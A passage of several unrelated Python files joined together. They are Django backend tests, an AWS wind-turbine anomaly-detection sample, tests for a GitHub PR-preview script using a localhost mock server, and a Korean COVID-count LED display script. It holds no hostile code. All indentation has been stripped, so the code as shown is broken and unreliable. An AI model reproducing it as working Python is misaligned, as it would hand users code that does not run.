obj = models.Object.objects.create()
obj.related_objects.create()
self.assertEqual(models.Object.objects.count(), 2)
self.assertEqual(obj.related_objects.count(), 1)
intermediary_model = models.Object._meta.get_field("related_objects").rel.through
intermediary_model.objects.create(from_object_id=obj.id, to_object_id=12345)
self.assertEqual(obj.related_objects.count(), 1)
self.assertEqual(intermediary_model.objects.count(), 2)
class BackendUtilTests(TestCase):
def test_format_number(self):
"""
Test the format_number converter utility
"""
def equal(value, max_d, places, result):
self.assertEqual(format_number(Decimal(value), max_d, places), result)
equal('0', 12, 3,
'0.000')
equal('0', 12, 8,
'0.00000000')
equal('1', 12, 9,
'1.000000000')
equal('0.00000000', 12, 8,
'0.00000000')
equal('0.000000004', 12, 8,
'0.00000000')
equal('0.000000008', 12, 8,
'0.00000001')
equal('0.000000000000000000999', 10, 8,
'0.00000000')
equal('0.1234567890', 12, 10,
'0.1234567890')
equal('0.1234567890', 12, 9,
'0.123456789')
equal('0.1234567890', 12, 8,
'0.12345679')
equal('0.1234567890', 12, 5,
'0.12346')
equal('0.1234567890', 12, 3,
'0.123')
equal('0.1234567890', 12, 1,
'0.1')
equal('0.1234567890', 12, 0,
'0')
equal('0.1234567890', None, 0,
'0')
equal('1234567890.1234567890', None, 0,
'1234567890')
equal('1234567890.1234567890', None, 2,
'1234567890.12')
equal('0.1234', 5, None,
'0.1234')
equal('123.12', 5, None,
'123.12')
with self.assertRaises(Rounded):
equal('0.1234567890', 5, None,
'0.12346')
with self.assertRaises(Rounded):
equal('1234567890.1234', 5, None,
'1234600000')
@ignore_warnings(category=UserWarning,
message="Overriding setting DATABASES can lead to unexpected behavior")
class DBTestSettingsRenamedTests(TestCase):
mismatch_msg = ("Connection 'test-deprecation' has mismatched TEST "
"and TEST_* database settings.")
def setUp(self):
super(DBTestSettingsRenamedTests, self).setUp()
self.handler = ConnectionHandler()
self.db_settings = {'default': {}}
def test_mismatched_database_test_settings_1(self):
# if the TEST setting is used, all TEST_* keys must appear in it.
self.db_settings.update({
'test-deprecation': {
'TEST': {},
'TEST_NAME': 'foo',
}
})
with override_settings(DATABASES=self.db_settings):
with self.assertRaisesMessage(ImproperlyConfigured, self.mismatch_msg):
self.handler.prepare_test_settings('test-deprecation')
def test_mismatched_database_test_settings_2(self):
# if the TEST setting is used, all TEST_* keys must match.
self.db_settings.update({
'test-deprecation': {
'TEST': {'NAME': 'foo'},
'TEST_NAME': 'bar',
},
})
with override_settings(DATABASES=self.db_settings):
with self.assertRaisesMessage(ImproperlyConfigured, self.mismatch_msg):
self.handler.prepare_test_settings('test-deprecation')
def test_mismatched_database_test_settings_3(self):
# Verifies the mapping of an aliased key.
self.db_settings.update({
'test-deprecation': {
'TEST': {'CREATE_DB': 'foo'},
'TEST_CREATE': 'bar',
},
})
with override_settings(DATABASES=self.db_settings):
with self.assertRaisesMessage(ImproperlyConfigured, self.mismatch_msg):
self.handler.prepare_test_settings('test-deprecation')
def test_mismatched_database_test_settings_4(self):
# Verifies the mapping of an aliased key when the aliased key is missing.
self.db_settings.update({
'test-deprecation': {
'TEST': {},
'TEST_CREATE': 'bar',
},
})
with override_settings(DATABASES=self.db_settings):
with self.assertRaisesMessage(ImproperlyConfigured, self.mismatch_msg):
self.handler.prepare_test_settings('test-deprecation')
def test_mismatched_settings_old_none(self):
self.db_settings.update({
'test-deprecation': {
'TEST': {'CREATE_DB': None},
'TEST_CREATE': '',
},
})
with override_settings(DATABASES=self.db_settings):
with self.assertRaisesMessage(ImproperlyConfigured, self.mismatch_msg):
self.handler.prepare_test_settings('test-deprecation')
def test_mismatched_settings_new_none(self):
self.db_settings.update({
'test-deprecation': {
'TEST': {},
'TEST_CREATE': None,
},
})
with override_settings(DATABASES=self.db_settings):
with self.assertRaisesMessage(ImproperlyConfigured, self.mismatch_msg):
self.handler.prepare_test_settings('test-deprecation')
def test_matched_test_settings(self):
# should be able to define new settings and the old, if they match
self.db_settings.update({
'test-deprecation': {
'TEST': {'NAME': 'foo'},
'TEST_NAME': 'foo',
},
})
with override_settings(DATABASES=self.db_settings):
self.handler.prepare_test_settings('test-deprecation')
def test_new_settings_only(self):
# should be able to define new settings without the old
self.db_settings.update({
'test-deprecation': {
'TEST': {'NAME': 'foo'},
},
})
with override_settings(DATABASES=self.db_settings):
self.handler.prepare_test_settings('test-deprecation')
@ignore_warnings(category=RemovedInDjango19Warning)
def test_old_settings_only(self):
# should be able to define old settings without the new
self.db_settings.update({
'test-deprecation': {
'TEST_NAME': 'foo',
},
})
with override_settings(DATABASES=self.db_settings):
self.handler.prepare_test_settings('test-deprecation')
def test_empty_settings(self):
with override_settings(DATABASES=self.db_settings):
self.handler.prepare_test_settings('default')
@unittest.skipUnless(connection.vendor == 'sqlite', 'SQLite specific test.')
@skipUnlessDBFeature('can_share_in_memory_db')
class TestSqliteThreadSharing(TransactionTestCase):
available_apps = ['backends']
def test_database_sharing_in_threads(self):
def create_object():
models.Object.objects.create()
create_object()
thread = threading.Thread(target=create_object)
thread.start()
thread.join()
self.assertEqual(models.Object.objects.count(), 2)
|
windfarm.py
|
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
# SPDX-License-Identifier: MIT-0
import threading
import math
import random
import pywt
import numpy as np
import logging
import time
import os
from turbine import WindTurbine
from edgeagentclient import EdgeAgentClient
from ota import OTAModelUpdate
class WindTurbineFarm(object):
"""
    This is the application class. It is responsible for:
    - Creating the virtual edge devices (as threads)
    - Launching one Edge Agent in each virtual device
    - Loading the wind turbine anomaly detection model into each Edge Agent
    - Launching the virtual Wind Turbines
    - Launching an Edge Agent Client that integrates each Wind Turbine with its Edge Device
    - Displaying the UI
"""
def __init__(self, simulator, mqtt_host, mqtt_port):
if simulator is None:
raise Exception("You need to pass the simulator as argument")
self.simulator = simulator
self.n_turbines = simulator.get_num_turbines()
self.mqtt_host = mqtt_host
self.mqtt_port = mqtt_port
## launch edge agent clients
self.edge_agents = [EdgeAgentClient('/tmp/agent%d' % i) for i in range(self.n_turbines)]
self.model_meta = [{'model_name':None} for i in range(self.n_turbines)]
self.ota_devices = []
# we need to load the statistics computed in the data prep notebook
        # these statistics will be used to normalize the input
self.raw_std = np.load('../../../statistics/raw_std.npy')
self.mean = np.load('../../../statistics/mean.npy')
self.std = np.load('../../../statistics/std.npy')
# then we load the thresholds computed in the training notebook
        # for more info, take a look at Notebook #2
self.thresholds = np.load('../../../statistics/thresholds.npy')
# configurations to format the time based data for the anomaly detection model
# If you change these parameters you need to retrain your model with the new parameters
self.INTERVAL = 5 # seconds
        self.TIME_STEPS = 20 * self.INTERVAL # readings arrive every 50ms -> 20 samples/sec * INTERVAL seconds
self.STEP = 10
# these are the features used in this application
        self.feature_ids = [8, 9, 10, 7, 22, 5, 6] # qx, qy, qz, qw, wind_speed_rps, rps, voltage
self.n_features = 6 # roll, pitch, yaw, wind_speed, rotor_speed, voltage
self.running = False # running status
        # minimal buffer length for denoising. We need to accumulate some samples before denoising
self.min_num_samples = 500
def __create_dataset__(self, X, time_steps=1, step=1):
"""
This encodes a list of readings into the correct shape
expected by the model. It uses the concept of a sliding window
"""
Xs = []
for i in range(0, len(X) - time_steps, step):
v = X[i:(i + time_steps)]
Xs.append(v)
return np.array(Xs)
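    # For illustration: the detection loop below trims the buffer to
    # TIME_STEPS + STEP = 110 rows, so an input of shape (110, 6) yields a
    # single sliding window, i.e. an array of shape (1, 100, 6), which is
    # later reshaped to (1, n_features, 10, 10) before inference.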
def __euler_from_quaternion__(self, x, y, z, w):
"""
Convert a quaternion into euler angles (roll, pitch, yaw)
roll is rotation around x in radians (counterclockwise)
pitch is rotation around y in radians (counterclockwise)
yaw is rotation around z in radians (counterclockwise)
"""
t0 = +2.0 * (w * x + y * z)
t1 = +1.0 - 2.0 * (x * x + y * y)
roll_x = math.atan2(t0, t1)
t2 = +2.0 * (w * y - z * x)
t2 = +1.0 if t2 > +1.0 else t2
t2 = -1.0 if t2 < -1.0 else t2
pitch_y = math.asin(t2)
t3 = +2.0 * (w * z + x * y)
t4 = +1.0 - 2.0 * (y * y + z * z)
yaw_z = math.atan2(t3, t4)
return roll_x, pitch_y, yaw_z # in radians
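    # For illustration: the identity quaternion (x, y, z, w) = (0, 0, 0, 1)
    # maps to (0.0, 0.0, 0.0), and a pure 90-degree yaw, roughly
    # (0, 0, 0.7071, 0.7071), maps to approximately (0.0, 0.0, pi/2).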
def __wavelet_denoise__(self, data, wavelet, noise_sigma):
'''
Filter accelerometer data using wavelet denoising
Modification of F. Blanco-Silva's code at: https://goo.gl/gOQwy5
'''
wavelet = pywt.Wavelet(wavelet)
levels = min(5, (np.floor(np.log2(data.shape[0]))).astype(int))
# Francisco's code used wavedec2 for image data
wavelet_coeffs = pywt.wavedec(data, wavelet, level=levels)
threshold = noise_sigma*np.sqrt(2*np.log2(data.size))
new_wavelet_coeffs = map(lambda x: pywt.threshold(x, threshold, mode='soft'), wavelet_coeffs)
return pywt.waverec(list(new_wavelet_coeffs), wavelet)
def __del__(self):
"""Destructor"""
self.halt()
def __data_prep__(self, turbine_id, buffer):
"""
This method is called for each reading.
Here we do some data prep and accumulate the data in the buffer
for denoising
"""
new_buffer = []
for data in buffer:
roll,pitch,yaw = self.__euler_from_quaternion__(
data[self.feature_ids[0]],data[self.feature_ids[1]],
data[self.feature_ids[2]],data[self.feature_ids[3]]
)
row = [roll,pitch,yaw, data[self.feature_ids[4]],data[self.feature_ids[5]], data[self.feature_ids[6]]]
new_buffer.append(row)
return np.array(new_buffer)
def __detect_anomalies__(self):
"""
Keeps processing the data collected from the turbines
and do anomaly detection. It reports to each turbine the
anomalies detected (through a callback)
"""
while self.running:
# for each turbine, check the buffer
start_time = time.time()
for idx in range(self.n_turbines):
if self.simulator.is_turbine_running(idx):
buffer = self.simulator.get_raw_data(idx)
if len(buffer) >= self.min_num_samples:
self.simulator.update_dashboard(idx, np.array(buffer))
# create a copy & prep the data
data = self.__data_prep__(idx, np.array(buffer) )
if not self.edge_agents[idx].is_model_loaded(self.model_meta[idx]['model_name']):
self.simulator.update_label(idx, 'Model not loaded')
continue
# denoise
data = np.array([self.__wavelet_denoise__(data[:,i], 'db6', self.raw_std[i]) for i in range(self.n_features)])
data = data.transpose((1,0))
# normalize
data -= self.mean
data /= self.std
data = data[-(self.TIME_STEPS+self.STEP):]
# create the dataset and reshape it
x = self.__create_dataset__(data, self.TIME_STEPS, self.STEP)
x = np.transpose(x, (0, 2, 1)).reshape(x.shape[0], self.n_features, 10, 10)
# run the model
p = self.edge_agents[idx].predict(self.model_meta[idx]['model_name'], x)
if p is not None:
a = x.reshape(x.shape[0], self.n_features, 100).transpose((0,2,1))
b = p.reshape(p.shape[0], self.n_features, 100).transpose((0,2,1))
# check the anomalies
pred_mae_loss = np.mean(np.abs(b - a), axis=1).transpose((1,0))
values = np.mean(pred_mae_loss, axis=1)
anomalies = (values > self.thresholds)
self.simulator.detected_anomalies(idx, values, anomalies)
elapsed_time = time.time() - start_time
            time.sleep(max(0.0, 0.5 - elapsed_time))  # never pass a negative delay if an iteration took longer than 0.5s
def notify_model_update(self, device_id, model_name, model_version):
logging.info("Loading model %s version %f in device %d" % ( model_name, model_version, device_id))
model_path = 'agent/model/%d/%s/%s' % (device_id, model_name, str(model_version))
if self.edge_agents[device_id].is_model_loaded(model_name):
if model_version > self.model_meta[device_id]['model_version']:
logging.info("Unloading old model: %s v: %s" % (model_name, str(model_version) ) )
self.edge_agents[device_id].unload_model(model_name)
self.simulator.update_label(device_id, "Model unloaded: %.01f" % self.model_meta[device_id]['model_version'])
else:
logging.info("New model is equals to the previous")
return
ret = self.edge_agents[device_id].load_model(model_name, model_path)
if ret is not None:
self.model_meta[device_id]['model_name'] = model_name
self.model_meta[device_id]['model_path'] = model_path
self.model_meta[device_id]['model_version'] = model_version
self.simulator.update_label(device_id, 'Model Loaded: %.01f' % model_version)
def start(self):
"""
Run the main application by creating the Edge Agents, loading the model and
kicking-off the anomaly detector program
"""
if not self.running:
self.running = True
for i in range(self.n_turbines):
self.ota_devices.append(OTAModelUpdate(i, 'edge-device-%d' % i,
self.mqtt_host, self.mqtt_port, self.notify_model_update))
logging.info("Starting the anomaly detector loop...")
# finally start the anomaly detection loop
self.processing = threading.Thread(target=self.__detect_anomalies__)
self.processing.start()
def halt(self):
"""
Destroys the application and halts the agents & turbines
"""
if self.running:
self.running = False
self.processing.join()
self.simulator.halt()
            # Drop the OTA update listeners so they can be garbage collected;
            # the anomaly detector thread was already joined above.
            self.ota_devices = []
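# Illustrative usage sketch (the simulator object and MQTT endpoint below are
# hypothetical; the real wiring lives in the project's entry point script):
#
#   simulator = Simulator(num_turbines=2)              # hypothetical helper
#   farm = WindTurbineFarm(simulator, 'localhost', 8883)
#   farm.start()   # creates the OTA listeners and spawns the detection thread
#   ...            # turbines stream readings; anomalies are reported back
#   farm.halt()    # stops the detection loop and the simulator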
|
test_update_pr_preview.py
|
import BaseHTTPServer
import json
import os
import subprocess
import tempfile
import threading
subject = os.path.join(
os.path.dirname(os.path.abspath(__file__)), '..', 'update_pr_preview.py'
)
test_host = 'localhost'
class MockHandler(BaseHTTPServer.BaseHTTPRequestHandler, object):
def do_all(self):
request = (self.command, self.path)
self.server.requests.append(request)
status_code, body = self.server.responses.get(request, (200, '{}'))
self.send_response(status_code)
self.end_headers()
self.wfile.write(body)
def do_DELETE(self):
return self.do_all()
def do_GET(self):
return self.do_all()
def do_PATCH(self):
return self.do_all()
def do_POST(self):
return self.do_all()
class MockServer(BaseHTTPServer.HTTPServer, object):
'''HTTP server that responds to all requests with status code 200 and body
'{}' unless an alternative status code and body are specified for the given
method and path in the `responses` parameter.'''
def __init__(self, address, responses=None):
super(MockServer, self).__init__(address, MockHandler)
self.responses = responses or {}
self.requests = []
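# Illustrative usage (hypothetical values): the tests below prime specific
# responses per (method, path) pair and let everything else fall through to
# the 200/'{}' default, e.g.:
#
#   server = MockServer((test_host, 0), {
#       ('GET', '/repos/test-org/test-repo/collaborators/rms'): (404, '{}'),
#   })
#   threading.Thread(target=server.serve_forever).start()
#   # ...issue requests against server.server_address, inspect server.requests,
#   # then call server.shutdown()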
def assert_success(returncode):
assert returncode == 0
def assert_neutral(returncode):
assert returncode == 78
def assert_fail(returncode):
assert returncode not in (0, 78)
def run(event_data, responses=None):
    fd, event_data_file = tempfile.mkstemp()
    os.close(fd)  # only the path is needed; avoid leaking the descriptor
env = {
'GITHUB_EVENT_PATH': event_data_file,
'GITHUB_REPOSITORY': 'test-org/test-repo'
}
env.update(os.environ)
server = MockServer((test_host, 0), responses)
test_port = server.server_address[1]
threading.Thread(target=lambda: server.serve_forever()).start()
try:
with open(event_data_file, 'w') as handle:
json.dump(event_data, handle)
child = subprocess.Popen(
['python', subject, 'http://{}:{}'.format(test_host, test_port)],
env=env
)
child.communicate()
finally:
server.shutdown()
os.remove(event_data_file)
return child.returncode, server.requests
def default_data(action):
return {
'pull_request': {
'number': 543,
'closed_at': None,
'head': {
'sha': 'deadbeef'
},
'user': {
'login': 'rms'
},
'labels': [
{'name': 'foo'},
{'name': 'bar'}
]
},
'action': action
}
def test_close_active_with_label():
event_data = default_data('closed')
event_data['pull_request']['closed_at'] = '2019-07-05'
event_data['pull_request']['labels'].append(
{'name': 'pull-request-has-preview'}
)
delete_label = (
'DELETE',
'/repos/test-org/test-repo/issues/543/labels/pull-request-has-preview'
)
delete_tag = (
'DELETE', '/repos/test-org/test-repo/git/refs/tags/pr_preview_543'
)
returncode, requests = run(event_data)
assert_success(returncode)
assert delete_label in requests
assert delete_tag in requests
def test_close_active_with_label_error():
event_data = default_data('closed')
event_data['pull_request']['closed_at'] = '2019-07-05'
event_data['pull_request']['labels'].append(
{'name': 'pull-request-has-preview'}
)
responses = {(
'DELETE',
'/repos/test-org/test-repo/issues/543/labels/pull-request-has-preview'
): (500, '{}')}
returncode, requests = run(event_data, responses)
assert_fail(returncode)
def test_close_active_without_label():
event_data = default_data('closed')
event_data['pull_request']['closed_at'] = '2019-07-05'
returncode, requests = run(event_data)
assert_neutral(returncode)
assert len(requests) == 0
def test_open_with_label():
event_data = default_data('opened')
event_data['pull_request']['labels'].append(
{'name': 'pull-request-has-preview'}
)
returncode, requests = run(event_data)
assert_success(returncode)
expected = (
'PATCH',
'/repos/test-org/test-repo/git/refs/tags/pr_preview_543'
)
assert expected in requests
def test_open_without_label_for_collaborator():
event_data = default_data('opened')
responses = {
('GET', '/repos/test-org/test-repo/collaborators/rms'): (204, ''),
('GET', '/repos/test-org/test-repo/git/refs/tags/pr_preview_543'):
(404, '{}')
}
returncode, requests = run(event_data, responses)
assert_success(returncode)
create_label = ('POST', '/repos/test-org/test-repo/issues/543/labels')
create_tag = ('POST', '/repos/test-org/test-repo/git/refs')
    for primed_request in responses:
        assert primed_request in requests
assert create_label in requests
assert create_tag in requests
def test_open_without_label_for_non_collaborator():
event_data = default_data('opened')
responses = {
('GET', '/repos/test-org/test-repo/collaborators/rms'): (404, '{}')
}
returncode, requests = run(event_data, responses)
assert_neutral(returncode)
expected = [(
'GET', '/repos/test-org/test-repo/collaborators/rms'
)]
assert expected == requests
def test_add_unrelated_label():
event_data = default_data('labeled')
event_data['label'] = {'name': 'foobar'}
event_data['pull_request']['labels'].append({'name': 'foobar'})
returncode, requests = run(event_data)
assert_neutral(returncode)
assert len(requests) == 0
def test_add_active_label():
event_data = default_data('labeled')
event_data['label'] = {'name': 'pull-request-has-preview'}
event_data['pull_request']['labels'].append(
{'name': 'pull-request-has-preview'}
)
responses = {(
'GET', '/repos/test-org/test-repo/git/refs/tags/pr_preview_543'
): (404, '{}')}
returncode, requests = run(event_data, responses)
assert_success(returncode)
expected = ('POST', '/repos/test-org/test-repo/git/refs')
assert responses.keys()[0] in requests
assert expected in requests
def test_remove_unrelated_label():
event_data = default_data('unlabeled')
event_data['label'] = {'name': 'foobar'}
returncode, requests = run(event_data)
assert_neutral(returncode)
assert len(requests) == 0
def test_remove_active_label():
event_data = default_data('unlabeled')
event_data['label'] = {'name': 'pull-request-has-preview'}
responses = {
('DELETE', '/repos/test-org/test-repo/git/refs/tags/pr_preview_543'):
(204, '')
}
returncode, requests = run(event_data, responses)
assert_success(returncode)
assert responses.keys()[0] in requests
def test_synchronize_without_label():
event_data = default_data('synchronize')
returncode, requests = run(event_data)
assert_neutral(returncode)
assert len(requests) == 0
def test_synchronize_with_label():
event_data = default_data('synchronize')
event_data['pull_request']['labels'].append(
{'name': 'pull-request-has-preview'}
)
returncode, requests = run(event_data)
assert_success(returncode)
expected = (
'PATCH',
'/repos/test-org/test-repo/git/refs/tags/pr_preview_543'
)
assert expected in requests
def test_unrecognized_action():
event_data = default_data('assigned')
returncode, requests = run(event_data)
assert_neutral(returncode)
assert len(requests) == 0
|
main_color.py
|
import json
import crawlKoreaData_All as crawl1
import crawlKoreaData_Gyeonggi as crawl2
import crawlKoreaData_Seoul as crawl3
import LED_Display as LMD
import threading
from datetime import date, timedelta
import datetime
from matrix import *
today = date.today()
oneday = datetime.timedelta(days=1)
yesterday = today - oneday
third = today - oneday - oneday
a = str(today)
b = str(yesterday)
c = str(third)
def LED_init():
thread=threading.Thread(target=LMD.main, args=())
thread.setDaemon(True)
thread.start()
return
crawl1.run()
crawl2.run()
crawl3.run()
def draw_matrix(array):
for x in range(16):
for y in range(32):
if array[x][y] == 1:
LMD.set_pixel(x,y,4) #blue
elif array[x][y] == 2:
LMD.set_pixel(x,y,3) #yellow
elif array[x][y] == 3:
LMD.set_pixel(x,y,1) #red
elif array[x][y] == 4:
LMD.set_pixel(x,y,2) #green
elif array[x][y] == 0:
LMD.set_pixel(x,y,0)
else:
continue
print()
array_screen = [
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]]
number_array = [
[[1,1,1,0],
[1,0,1,0],
[1,0,1,0],
[1,0,1,0],
[1,1,1,0]], #0
[[0,1,0,0],
[0,1,0,0],
[0,1,0,0],
[0,1,0,0],
[0,1,0,0]], #1
[[1,1,1,0],
[0,0,1,0],
[1,1,1,0],
[1,0,0,0],
[1,1,1,0]], #2
[[1,1,1,0],
[0,0,1,0],
[1,1,1,0],
[0,0,1,0],
[1,1,1,0]], #3
[[1,0,1,0],
[1,0,1,0],
[1,1,1,0],
[0,0,1,0],
[0,0,1,0]], #4
[[1,1,1,0],
[1,0,0,0],
[1,1,1,0],
[0,0,1,0],
[1,1,1,0]], #5
[[1,1,1,0],
[1,0,0,0],
[1,1,1,0],
[1,0,1,0],
[1,1,1,0]], #6
[[1,1,1,0],
[0,0,1,0],
[0,1,0,0],
[0,1,0,0],
[0,1,0,0]], #7
[[1,1,1,0],
[1,0,1,0],
[1,1,1,0],
[1,0,1,0],
[1,1,1,0]], #8
[[1,1,1,0],
[1,0,1,0],
[1,1,1,0],
[0,0,1,0],
[0,0,1,0]], #9
]
number_array_1 = [
[[1,1,1,0],
[1,0,1,0],
[1,0,1,0],
[1,0,1,0],
[1,1,1,0]], #0
[[0,1,0,0],
[0,1,0,0],
[0,1,0,0],
[0,1,0,0],
[0,1,0,0]], #1
[[1,1,1,0],
[0,0,1,0],
[1,1,1,0],
[1,0,0,0],
[1,1,1,0]], #2
[[1,1,1,0],
[0,0,1,0],
[1,1,1,0],
[0,0,1,0],
[1,1,1,0]], #3
[[1,0,1,0],
[1,0,1,0],
[1,1,1,0],
[0,0,1,0],
[0,0,1,0]], #4
[[1,1,1,0],
[1,0,0,0],
[1,1,1,0],
[0,0,1,0],
[1,1,1,0]], #5
[[1,1,1,0],
[1,0,0,0],
[1,1,1,0],
[1,0,1,0],
[1,1,1,0]], #6
[[1,1,1,0],
[0,0,1,0],
[0,1,0,0],
[0,1,0,0],
[0,1,0,0]], #7
[[1,1,1,0],
[1,0,1,0],
[1,1,1,0],
[1,0,1,0],
[1,1,1,0]], #8
[[1,1,1,0],
[1,0,1,0],
[1,1,1,0],
[0,0,1,0],
[0,0,1,0]] #9
]
number_array_2 = [ #yellow
[[2, 2, 2, 0],
[2, 0, 2, 0],
[2, 0, 2, 0],
[2, 0, 2, 0],
[2, 2, 2, 0]], # 0
[[0, 2, 0, 0],
[0, 2, 0, 0],
[0, 2, 0, 0],
[0, 2, 0, 0],
[0, 2, 0, 0]], # 1
[[2, 2, 2, 0],
[0, 0, 2, 0],
[2, 2, 2, 0],
[2, 0, 0, 0],
[2, 2, 2, 0]], # 2
[[2, 2, 2, 0],
[0, 0, 2, 0],
[2, 2, 2, 0],
[0, 0, 2, 0],
[2, 2, 2, 0]], # 3
[[2, 0, 2, 0],
[2, 0, 2, 0],
[2, 2, 2, 0],
[0, 0, 2, 0],
[0, 0, 2, 0]], # 4
[[2, 2, 2, 0],
[2, 0, 0, 0],
[2, 2, 2, 0],
[0, 0, 2, 0],
[2, 2, 2, 0]], # 5
[[2, 2, 2, 0],
[2, 0, 0, 0],
[2, 2, 2, 0],
[2, 0, 2, 0],
[2, 2, 2, 0]], # 6
[[2, 2, 2, 0],
[0, 0, 2, 0],
[0, 2, 0, 0],
[0, 2, 0, 0],
[0, 2, 0, 0]], # 7
[[2, 2, 2, 0],
[2, 0, 2, 0],
[2, 2, 2, 0],
[2, 0, 2, 0],
[2, 2, 2, 0]], # 8
[[2, 2, 2, 0],
[2, 0, 2, 0],
[2, 2, 2, 0],
[0, 0, 2, 0],
[0, 0, 2, 0]] # 9
]
number_array_3 = [ #red
[[3, 3, 3, 0],
[3, 0, 3, 0],
[3, 0, 3, 0],
[3, 0, 3, 0],
[3, 3, 3, 0]], # 0
[[0, 3, 0, 0],
[0, 3, 0, 0],
[0, 3, 0, 0],
[0, 3, 0, 0],
[0, 3, 0, 0]], # 1
[[3, 3, 3, 0],
[0, 0, 3, 0],
[3, 3, 3, 0],
[3, 0, 0, 0],
[3, 3, 3, 0]], # 2
[[3, 3, 3, 0],
[0, 0, 3, 0],
[3, 3, 3, 0],
[0, 0, 3, 0],
[3, 3, 3, 0]], # 3
[[3, 0, 3, 0],
[3, 0, 3, 0],
[3, 3, 3, 0],
[0, 0, 3, 0],
[0, 0, 3, 0]], # 4
[[3, 3, 3, 0],
[3, 0, 0, 0],
[3, 3, 3, 0],
[0, 0, 3, 0],
[3, 3, 3, 0]], # 5
[[3, 3, 3, 0],
[3, 0, 0, 0],
[3, 3, 3, 0],
[3, 0, 3, 0],
[3, 3, 3, 0]], # 6
[[3, 3, 3, 0],
[0, 0, 3, 0],
[0, 3, 0, 0],
[0, 3, 0, 0],
[0, 3, 0, 0]], # 7
[[3, 3, 3, 0],
[3, 0, 3, 0],
[3, 3, 3, 0],
[3, 0, 3, 0],
[3, 3, 3, 0]], # 8
[[3, 3, 3, 0],
[3, 0, 3, 0],
[3, 3, 3, 0],
[0, 0, 3, 0],
[0, 0, 3, 0]]
]
number_array_4 = [ #green
[[4, 4, 4, 0],
[4, 0, 4, 0],
[4, 0, 4, 0],
[4, 0, 4, 0],
[4, 4, 4, 0]], # 0
[[0, 4, 0, 0],
[0, 4, 0, 0],
[0, 4, 0, 0],
[0, 4, 0, 0],
[0, 4, 0, 0]], # 1
[[4, 4, 4, 0],
[0, 0, 4, 0],
[4, 4, 4, 0],
[4, 0, 0, 0],
[4, 4, 4, 0]], # 2
[[4, 4, 4, 0],
[0, 0, 4, 0],
[4, 4, 4, 0],
[0, 0, 4, 0],
[4, 4, 4, 0]], # 3
[[4, 0, 4, 0],
[4, 0, 4, 0],
[4, 4, 4, 0],
[0, 0, 4, 0],
[0, 0, 4, 0]], # 4
[[4, 4, 4, 0],
[4, 0, 0, 0],
[4, 4, 4, 0],
[0, 0, 4, 0],
[4, 4, 4, 0]], # 5
[[4, 4, 4, 0],
[4, 0, 0, 0],
[4, 4, 4, 0],
[4, 0, 4, 0],
[4, 4, 4, 0]], # 6
[[4, 4, 4, 0],
[0, 0, 4, 0],
[0, 4, 0, 0],
[0, 4, 0, 0],
[0, 4, 0, 0]], # 7
[[4, 4, 4, 0],
[4, 0, 4, 0],
[4, 4, 4, 0],
[4, 0, 4, 0],
[4, 4, 4, 0]], # 8
[[4, 4, 4, 0],
[4, 0, 4, 0],
[4, 4, 4, 0],
[0, 0, 4, 0],
[0, 0, 4, 0]]
]
covid_array = [
[[0, 1, 1, 1, 1],
[1, 0, 0, 0, 0],
[1, 0, 0, 0, 0],
[1, 0, 0, 0, 0],
[0, 1, 1, 1, 1]], # C
[[0, 1, 1, 1, 0],
[1, 0, 0, 0, 1],
[1, 0, 0, 0, 1],
[1, 0, 0, 0, 1],
[0, 1, 1, 1, 0]], # O
[[1, 0, 0, 0, 1],
[1, 0, 0, 0, 1],
[0, 1, 0, 1, 0],
[0, 0, 1, 0, 0],
[0, 0, 1, 0, 0]], # V
[[0, 1, 1, 1, 0],
[0, 0, 1, 0, 0],
[0, 0, 1, 0, 0],
[0, 0, 1, 0, 0],
[0, 1, 1, 1, 0]], # I
[[1, 1, 1, 0, 0],
[1, 0, 0, 1, 0],
[1, 0, 0, 1, 0],
[1, 0, 0, 1, 0],
[1, 1, 1, 0, 0]] # D
]
arrow_array = [
[[0,1,0],
[1,1,1],
[0,1,0],
[0,1,0],
[0,1,0]]
]
LED_init()
draw_matrix(array_screen); print()
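# Compare today's confirmed-case counts against an earlier day's file and draw
# the difference for the requested region on the LED matrix: red digits for an
# increase greater than 5, yellow for 3-5, green for 0-2, followed by an arrow.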
def compare_data(js_file1, js_file2, search_region ,confirmed_cmp, array):
with open(js_file1, "r", encoding="utf-8") as f1:
with open(js_file2, "r", encoding="utf-8") as f2:
json_data_1 = json.load(f1)
json_data_2 = json.load(f2)
for i in range(0, len(json_data_1) - 1):
region = json_data_1[i]['지역이름']
confirmed_1 = json_data_1[i]['확진자수']
confirmed_2 = json_data_2[i]['확진자수']
cmp_data = confirmed_1 - confirmed_2
